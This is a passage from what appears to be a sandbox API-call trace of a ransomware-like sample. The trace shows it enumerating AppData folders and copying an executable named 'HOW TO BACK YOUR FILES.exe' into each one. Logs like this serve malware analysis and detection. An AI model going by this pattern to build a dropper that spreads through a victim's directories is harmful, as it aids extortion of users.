HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC" [0111.107] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.107] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\owlvmzrc\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.108] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.108] GetLastError () returned 0x0 [0111.108] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.108] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1d705b70, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x4dc868a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dc868a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.108] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0" [0111.109] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0" [0111.109] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.109] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\fkluidu0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.109] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.110] GetLastError () returned 0x0 [0111.110] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.110] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1d705b70, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x4dc868a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dc868a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.110] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33" [0111.110] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33" [0111.110] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.110] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.111] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.111] GetLastError () returned 0x0 [0111.111] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.111] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1d705b70, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x4dc868a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dc868a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.112] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3" [0111.112] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3" [0111.112] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.112] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\3lkbqzj3\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.113] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.113] GetLastError () returned 0x0 [0111.113] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.113] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1d705b70, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x4dcaca00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dcaca00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.114] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0" [0111.114] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0" [0111.114] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.114] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\imjp9_0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.115] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.115] GetLastError () returned 0x0 [0111.115] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.115] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4dcaca00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dcaca00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.115] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1" [0111.116] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1" [0111.116] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.116] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\imjp8_1\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.116] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.117] GetLastError () returned 0x0 [0111.117] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.117] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4dcaca00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dcaca00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.117] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12" [0111.117] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12" [0111.117] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.117] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\imjp12\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.118] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.118] GetLastError () returned 0x0 [0111.119] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.119] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4dcd2b60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dcd2b60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.119] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12" [0111.119] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12" [0111.119] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.119] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\ime12\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.120] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.120] GetLastError () returned 0x0 [0111.120] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.120] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd754c00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4dcd2b60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dcd2b60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.121] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS" [0111.121] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS" [0111.121] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.121] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\forms\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.122] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.122] GetLastError () returned 0x0 [0111.122] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.122] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d1d6940, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x6cd477c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cd477c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.122] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache" [0111.123] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache" [0111.123] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.123] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.123] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.124] GetLastError () returned 0x0 [0111.124] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.124] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6cd93a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cd93a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.124] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD" [0111.125] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD" [0111.125] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.125] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.125] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.126] GetLastError () returned 0x0 [0111.126] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.126] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6cdb9be0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cdb9be0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.126] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: 